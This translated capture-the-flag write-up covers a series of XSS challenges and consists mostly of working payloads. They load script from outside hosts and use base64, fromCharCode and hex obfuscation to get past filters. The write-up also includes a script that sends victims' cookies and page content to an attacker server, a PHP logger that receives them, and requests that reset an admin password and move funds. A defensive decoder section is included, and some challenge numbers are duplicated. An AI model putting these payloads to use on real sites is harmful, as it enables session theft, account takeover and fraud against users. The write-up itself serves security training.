Table of contents

  • Preface
  • web316
  • web317-319
  • An all-in payload for several of the earlier challenges
  • web320
  • web321
  • web322-324 (the ; character is filtered)
  • web325 (the . character is filtered)
  • Generating the String.fromCharCode payload used above
  • web327
  • web328
  • web329
  • web320
  • web331
  • web322-323
  • References

Preface

The payloads below need to be URL-decoded by yourselves. Most of them use a blind XSS platform (link at the very bottom). Where spaces are filtered, use / instead. Note that this may not really count as a write-up: I forgot to back up my notes earlier, so make do with it and work out the underlying principles on your own.

web316

http://e6e20854-17e6-4e0e-9f6f-b3c7e176250c.chall.ctf.show/?msg=%3Cscript+src%3D%22http%3A%2F%2Fy4tacker.top%2Fhack.js%22%3E%3C%2Fscript%3E

web317-319

http://35ac8af3-3eaa-4b9c-98cc-0b78d38e6706.chall.ctf.show/?msg=%3Cinput+onfocus%3Deval%28atob%28this.id%29%29+id%3DdmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHA6Ly95NHRhY2tlci50b3AvaGFjay5qcyI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs%3D+autofocus%3E

An all-in payload for several of the earlier challenges

<input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8veHNzOC5jYy8ySEpJIjtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw== autofocus>

web320

http://cc9e301d-d32a-4540-932a-6cd28d5d5acc.chall.ctf.show/?msg=<body/onload="document.write(String.fromCharCode(32,60,115,67,114,73,112,116,32,115,114,67,61,47,47,120,115,46,115,98,47,89,84,85,104,62,60,47,115,67,82,105,112,84,62));"

web321

http://cc9e301d-d32a-4540-932a-6cd28d5d5acc.chall.ctf.show/?msg=<body/onload="document.write(String.fromCharCode(32));document.write(String.fromCharCode(60));document.write(String.fromCharCode(115));document.write(String.fromCharCode(67));document.write(String.fromCharCode(114));document.write(String.fromCharCode(73));document.write(String.fromCharCode(112));document.write(String.fromCharCode(116));document.write(String.fromCharCode(32));document.write(String.fromCharCode(115));document.write(String.fromCharCode(114));document.write(String.fromCharCode(67));document.write(String.fromCharCode(61));document.write(String.fromCharCode(47));document.write(String.fromCharCode(47));document.write(String.fromCharCode(120));document.write(String.fromCharCode(115));document.write(String.fromCharCode(46));document.write(String.fromCharCode(115));document.write(String.fromCharCode(98));document.write(String.fromCharCode(47));document.write(String.fromCharCode(89));document.write(String.fromCharCode(84));document.write(String.fromCharCode(85));document.write(String.fromCharCode(104));document.write(String.fromCharCode(62));document.write(String.fromCharCode(60));document.write(String.fromCharCode(47));document.write(String.fromCharCode(115));document.write(String.fromCharCode(67));document.write(String.fromCharCode(82));document.write(String.fromCharCode(105));document.write(String.fromCharCode(112));document.write(String.fromCharCode(84));document.write(String.fromCharCode(62));"

web322-324 (the ; character is filtered)

<body/onload='document.write(String.fromCharCode(60));document.write(String.fromCharCode(115));document.write(String.fromCharCode(67));document.write(String.fromCharCode(114));document.write(String.fromCharCode(73));document.write(String.fromCharCode(112));document.write(String.fromCharCode(116));document.write(String.fromCharCode(32));document.write(String.fromCharCode(115));document.write(String.fromCharCode(114));document.write(String.fromCharCode(67));document.write(String.fromCharCode(61));document.write(String.fromCharCode(47));document.write(String.fromCharCode(47));document.write(String.fromCharCode(120));document.write(String.fromCharCode(115));document.write(String.fromCharCode(46));document.write(String.fromCharCode(115));document.write(String.fromCharCode(98));document.write(String.fromCharCode(47));document.write(String.fromCharCode(89));document.write(String.fromCharCode(84));document.write(String.fromCharCode(85));document.write(String.fromCharCode(104));document.write(String.fromCharCode(62));document.write(String.fromCharCode(60));document.write(String.fromCharCode(47));document.write(String.fromCharCode(115));document.write(String.fromCharCode(67));document.write(String.fromCharCode(82));document.write(String.fromCharCode(105));document.write(String.fromCharCode(112));document.write(String.fromCharCode(84));document.write(String.fromCharCode(62));'>

web325 (the . character is filtered)

<body/onload=eval("\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x53\x74\x72\x69\x6e\x67\x2e\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65\x28\x36\x30\x2c\x31\x31\x35\x2c\x36\x37\x2c\x31\x31\x34\x2c\x37\x33\x2c\x31\x31\x32\x2c\x31\x31\x36\x2c\x33\x32\x2c\x31\x31\x35\x2c\x31\x31\x34\x2c\x36\x37\x2c\x36\x31\x2c\x34\x37\x2c\x34\x37\x2c\x31\x32\x30\x2c\x31\x31\x35\x2c\x34\x36\x2c\x31\x31\x35\x2c\x39\x38\x2c\x34\x37\x2c\x38\x39\x2c\x38\x34\x2c\x38\x35\x2c\x31\x30\x34\x2c\x36\x32\x2c\x36\x30\x2c\x34\x37\x2c\x31\x31\x35\x2c\x36\x37\x2c\x38\x32\x2c\x31\x30\x35\x2c\x31\x31\x32\x2c\x38\x34\x2c\x36\x32\x29\x29\x3b")>

web326 (parentheses are filtered)

<body/onload=eval("\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x53\x74\x72\x69\x6e\x67\x2e\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65\x28\x36\x30\x2c\x31\x31\x35\x2c\x36\x37\x2c\x31\x31\x34\x2c\x37\x33\x2c\x31\x31\x32\x2c\x31\x31\x36\x2c\x33\x32\x2c\x31\x31\x35\x2c\x31\x31\x34\x2c\x36\x37\x2c\x36\x31\x2c\x34\x37\x2c\x34\x37\x2c\x31\x32\x30\x2c\x31\x31\x35\x2c\x34\x36\x2c\x31\x31\x35\x2c\x39\x38\x2c\x34\x37\x2c\x38\x39\x2c\x38\x34\x2c\x38\x35\x2c\x31\x30\x34\x2c\x36\x32\x2c\x36\x30\x2c\x34\x37\x2c\x31\x31\x35\x2c\x36\x37\x2c\x38\x32\x2c\x31\x30\x35\x2c\x31\x31\x32\x2c\x38\x34\x2c\x36\x32\x29\x29\x3b")>

Generating the String.fromCharCode payload used above

# Build the payload variants used in web320/web321 from the plain marker string
a = "<sCrIpt srC=//xs.sb/YTUh></sCRipT>"
res = ''    # comma-separated char codes for a single String.fromCharCode(...) call (web320)
res2 = ''   # one document.write(String.fromCharCode(n)); per character (web321)
for i in a:
    tmp = ord(i)
    res += str(tmp)
    res += ","
    res2 += f"document.write(String.fromCharCode({str(tmp)}));"
# print(res)
# print(res2)

# Turn the hex-encoded JS source into \xNN escapes for the eval("...") payload (web325/326)
a = "646f63756d656e742e777269746528537472696e672e66726f6d43686172436f64652836302c3131352c36372c3131342c37332c3131322c3131362c33322c3131352c3131342c36372c36312c34372c34372c3132302c3131352c34362c3131352c39382c34372c38392c38342c38352c3130342c36322c36302c34372c3131352c36372c38322c3130352c3131322c38342c363229293b"
z = 0
res = ''
for i in a:
    if z == 2:
        z = 0
    if z == 0:
        res += r"\x"   # start a new two-digit escape every second hex digit
    res += i
    z += 1
print(res)
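The defender-side counterpart of the generator above, added here as an example (it is not code from the original post): a decoder that recovers the injected markup from the String.fromCharCode, per-character document.write and \xNN variants, plus a check showing why a blacklist on ; . or <script misses them while HTML-encoding the reflected value does not. The sample strings are constructed here in the shape of the page's payloads.

```python
import html
import re

# Constructed samples shaped like the write-up's payloads; the first encodes the page's own
# marker string "<sCrIpt srC=//xs.sb/YTUh></sCRipT>", the third hides "document.write" in hex.
SAMPLE_FROMCHARCODE = ('<body/onload="document.write(String.fromCharCode('
                       '60,115,67,114,73,112,116,32,115,114,67,61,47,47,120,115,46,115,98,47,'
                       '89,84,85,104,62,60,47,115,67,82,105,112,84,62));">')
SAMPLE_PER_CHAR = ''.join(f'document.write(String.fromCharCode({ord(c)}));' for c in '<b>')
SAMPLE_HEX = r'<body/onload=eval("\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65")>'

FROMCHARCODE_RE = re.compile(r'String\.fromCharCode\(([\d,\s]*)\)')
HEX_ESCAPE_RE = re.compile(r'\\x([0-9a-fA-F]{2})')
WRITE_ONE_RE = re.compile(r'document\.write\((.)\);?')   # single-character writes (web321 style)

def decode_fromcharcode(s):
    """Replace each String.fromCharCode(n, n, ...) call with the characters it yields."""
    return FROMCHARCODE_RE.sub(
        lambda m: ''.join(chr(int(n)) for n in m.group(1).split(',') if n.strip()), s)

def decode_hex_escapes(s):
    """Replace JS \\xNN string escapes (the web325 trick that hides the '.') with their chars."""
    return HEX_ESCAPE_RE.sub(lambda m: chr(int(m.group(1), 16)), s)

def collapse_single_writes(s):
    """Join runs of document.write(<one char>); back into the string they build."""
    return WRITE_ONE_RE.sub(lambda m: m.group(1), s)

def deobfuscate(s, max_rounds=4):
    """Apply all three decoders until the text stops changing (hex may wrap fromCharCode)."""
    for _ in range(max_rounds):
        new = collapse_single_writes(decode_hex_escapes(decode_fromcharcode(s)))
        if new == s:
            break
        s = new
    return s

def blacklist_blocks(s, banned):
    """What the challenge filters do: reject only if a banned token appears literally."""
    return any(token in s.lower() for token in banned)

def encode_for_html(s):
    """The fix the filters stand in for: output-encode, so the input stays text, not markup."""
    return html.escape(s, quote=True)

if __name__ == '__main__':
    for sample in (SAMPLE_FROMCHARCODE, SAMPLE_PER_CHAR, SAMPLE_HEX):
        print(blacklist_blocks(sample, ('<script', '.')), '->', deobfuscate(sample))
```

Run the decoder over reflected parameters or WAF logs before applying any keyword check; the raw strings pass a blacklist on <script or . while their decoded forms do not.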

web327

Note: the recipient is admin, and there is no filtering.

web328

Self-hosted; the main goal is stealing the admin's cookie.
Write a JS file:

var img = new Image();
img.src = "http://y4tacker.top/index.php?q="+document.cookie
document.body.append(img);

Below is index.php:

<?php 
$cookie = $_GET['q'];
$myFile = "cookie.txt";
file_put_contents($myFile, $cookie, FILE_APPEND);
?>

Register with <script src=your JS URL></script> as the name, then replace the cookie in your browser with the one you received and visit the user management page.

web329

From this challenge onward, the group owner set it up so that the cookie is invalidated before it reaches you, so switch approaches and grab page elements instead.
Self-hosted:

var img = new Image();
img.src = "http://y4tacker.top/index.php?q=" + document.querySelector('#top > div.layui-container > div:nth-child(4) > div > div.layui-table-box > div.layui-table-body.layui-table-main').textContent;
document.body.append(img);

The receiving index.php is the same as in web328:

<?php
$cookie = $_GET['q'];
$myFile = "cookie.txt";
file_put_contents($myFile, $cookie, FILE_APPEND);
?>

web320

From the previous challenge we found that the password is admin*******, so let's just change the password:
$.ajax({url: "http://127.0.0.1/api/change.php?p=111111", success: function(result){}});

web331

$.ajax({
    url: "http://127.0.0.1/api/change.php",
    method: "POST",
    data: {
        'p': '111111'
    },
    cache: false,
    success: function(res) {}
});

web322-323

One is a GET request and the other a POST request; the payload is similar to web331. The main idea is to transfer money from admin to a new account you registered, then buy the flag. You may also notice the challenge has a small bug: transferring money to yourself also keeps increasing your balance.

Alright, considering everyone's level, here is a payload for this one. The two challenges use GET and POST respectively. We know that this jQuery ajax request cannot carry cookies, which makes it a bit awkward, but a request made locally (from the victim's own page) bypasses exactly that. First create an account named <script src=URL of my own exploit JS, whose content is below></script> (remember to expose it to the public internet), log in and then log out, then create an account named y4tacker and wait for the money to arrive.

$.ajax({
    url: "http://127.0.0.1/api/amount.php",
    method: "POST",
    data: {
        'u': 'y4tacker',
        'a': 10000
    },
    cache: false,
    success: function(res) {}
});

References

https://www.cnblogs.com/hookjoy/p/6181350.html
XSS platform: https://xsshs.cn/